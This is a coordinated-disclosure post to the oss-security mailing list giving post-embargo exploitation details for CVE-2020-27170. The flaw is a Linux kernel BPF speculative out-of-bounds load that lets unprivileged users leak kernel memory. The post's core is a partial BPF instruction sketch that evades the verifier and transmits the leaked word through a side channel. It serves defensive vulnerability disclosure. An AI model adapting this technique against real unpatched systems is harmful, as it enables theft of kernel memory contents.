Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <CAFzhf4rREUjn4=Z45GBxvo4CAvf5=xPEiu3O0rpnWF3hR-7AxQ@mail.gmail.com>
Date: Wed, 24 Mar 2021 19:34:50 +0000
From: Piotr Krysiuk <piotras@...il.com>
To: oss-security@...ts.openwall.com
Subject: Re: [CVE-2020-27170] Protection against speculatively out-of-bounds
 loads in the Linux kernel can be bypassed by unprivileged local users to leak
 content of kernel memory

Some details of how CVE-2020-27170 could be exploited in practice were
provided via linux-distros mailing list with 7 days embargo. This was
intended to help any affected Linux distributions to assess the risk
and decide about any appropriate actions.

As the embargo expires today, I was asked to share these details
publically on oss-security.

The CVE-2020-27170 vulnerability has been successfully reproduced
against Linux kernel v5.12-rc3 using the following logic for BPF
program attached to a socket:

    load bpf_context pointer (BPF_REG_1) into BPF_REG_CTX,
    load pointer to our big array into BPF_REG_MAP_PTR,
    load offset of data to leak into BPF_REG_OFFSET,

    // load any slowly-loaded value...
    BPF_LDX_MEM(BPF_DW, BPF_REG_SLOW_CHECK, BPF_REG_MAP_PTR, 0x1200),

    // ... and turn it into known zero for verifier,
    // while preserving slowly-loaded dependency for affected hardware
    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 1),
    BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 2),

    // speculatively bypassed offset check
    BPF_JMP_REG(BPF_JNE, BPF_REG_OFFSET, BPF_REG_SLOW_CHECK,
                skip_speculation),

    // speculatively unbounded pointer arithmetic
    BPF_ALU64_REG(BPF_ADD, BPF_REG_CTX, BPF_REG_OFFSET),

    // speculatively unbounded load
    BPF_LDX_MEM(BPF_W, BPF_REG_LEAKED_WORD, BPF_REG_CTX,
                offsetof(struct __sk_buff, protocol)),

    transmit speculatively loaded BPF_REG_LEAKED_WORD via side-channel,

The full reproducers were shared with a number of Linux distributions
for protection purposes.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.